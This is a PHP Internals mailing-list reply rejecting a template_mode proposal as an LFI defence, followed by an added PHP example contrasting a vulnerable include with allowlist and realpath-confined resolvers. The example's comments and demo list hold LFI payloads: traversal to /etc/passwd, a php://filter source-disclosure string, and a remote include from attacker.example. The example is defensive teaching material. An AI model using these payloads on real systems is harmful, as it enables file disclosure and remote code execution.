Hi!

> template_mode=on is not an actual security measure, but a
> switch for language mode. template_mode=on has a side
> effect that makes PHP as safe as other scripting languages
> or even better!

PHP is as safe as other scripting languages right now. And you are using
security talk to promote this proposal, including in this very email. If
you don't see it as a security feature, please do not talk about it as a
security feature.

> Therefore, it should not be misunderstood as a perfect LFI
> countermeasure even if I stressed its security meaning.
> I'm stressing security because this actually helps PHP be
> much safer than now.

I don't see how it is "much safer". Exactly the same problem exists. Not
only is it not a "perfect" countermeasure, it's not a countermeasure at
all, judging from your description. It's like saying "I have SQL injection
protection, but only if the word 'please' is not part of the SQL
injection". It's not a real protection then.

> PHP could be stronger against LFI compared to scripting languages,
> as I described in my previous mail.

PHP is as strong as any other language right now - if you include
user-supplied code, you have lost; don't do it - no problem.

> With this RFC, the infamous reputation of LFI can be removed from PHP!

I see no "infamous reputation" except the wrong one you are creating
right now. include with a user-supplied argument is a security hole; it
has nothing to do with a vulnerability in PHP.

-- 
Stanislav Malyshev, Software Architect
SugarCRM: http://www.sugarcrm.com/
(408)454-6900 ext. 227

-- 
PHP Internals - PHP Runtime Development Mailing List
To unsubscribe, visit: http://www.php.net/unsub.php
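The reply above rests on one point: the hole is `include` with a user-supplied argument, and no language-mode switch changes that. The PHP below is an added illustration, not code from the e-mail thread, from either participant, or from the PHP project. It puts the vulnerable pattern beside two hardened forms: mapping the user value to a fixed allowlist key, and, where a directory must be browsed, resolving with `realpath()` and checking the result stays under the base directory. The function names (`vulnerable_include`, `resolve_page`, `resolve_in_dir`), the `pages/` layout and the attacker strings in the demo are all assumptions constructed for this example.

```php
<?php
// Added example for the LFI point in the reply above. Not code from the
// PHP project or from the e-mail's participants; names are hypothetical.
declare(strict_types=1);

// The vulnerable pattern. Anything the client controls reaches include():
//   ../../../../etc/passwd            (local file read, .php appended here)
//   php://filter/convert.base64-encode/resource=config  (source disclosure)
//   http://attacker.example/shell     (RCE if allow_url_include=On)
function vulnerable_include(string $page): void
{
    include 'pages/' . $page . '.php';   // LFI: attacker chooses the path
}

// Hardened form 1: the user value is a key into a fixed map, never a path.
const PAGES = [
    'home'    => __DIR__ . '/pages/home.php',
    'about'   => __DIR__ . '/pages/about.php',
    'contact' => __DIR__ . '/pages/contact.php',
];

function resolve_page(string $requested): ?string
{
    return PAGES[$requested] ?? null;    // unknown key: nothing is included
}

// Hardened form 2: when the set of files is not fixed, canonicalise and
// confine to a base directory. realpath() returns false for missing files
// and for stream wrappers (php://, http://), so those never reach include().
function resolve_in_dir(string $baseDir, string $requested): ?string
{
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    $real = realpath($base . DIRECTORY_SEPARATOR . $requested . '.php');
    if ($real === false) {
        return null;
    }
    // Compare with the trailing separator included, so a sibling such as
    // /srv/pages2/x.php is not accepted as being under /srv/pages.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($real, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $real;
}

// Demo: builds a throwaway pages/ tree in the temp dir and shows what each
// resolver does with a legitimate key and with constructed attack strings.
if (PHP_SAPI === 'cli') {
    $dir = sys_get_temp_dir() . '/lfi-demo-' . getmypid();
    mkdir($dir . '/pages', 0700, true);
    file_put_contents($dir . '/pages/home.php', "<?php echo \"home\\n\";\n");

    $attempts = [
        'home',
        '../../../../etc/passwd',
        'php://filter/convert.base64-encode/resource=index',
        'http://attacker.example/shell',
    ];
    foreach ($attempts as $a) {
        $byMap = resolve_page($a) === null ? 'reject' : 'allow';
        $byDir = resolve_in_dir($dir . '/pages', $a) === null ? 'reject' : 'allow';
        printf("%-52s map:%-6s dir:%s\n", $a, $byMap, $byDir);
    }

    unlink($dir . '/pages/home.php');
    rmdir($dir . '/pages');
    rmdir($dir);
}
```

The map is the form to prefer: it removes the filesystem from the decision entirely, which is exactly the "don't do it" in the reply. The directory-confined variant is a fallback for content that genuinely has to be enumerated on disk; its safety depends on appending the fixed extension, on `realpath()` rejecting wrappers, and on the prefix check including the separator.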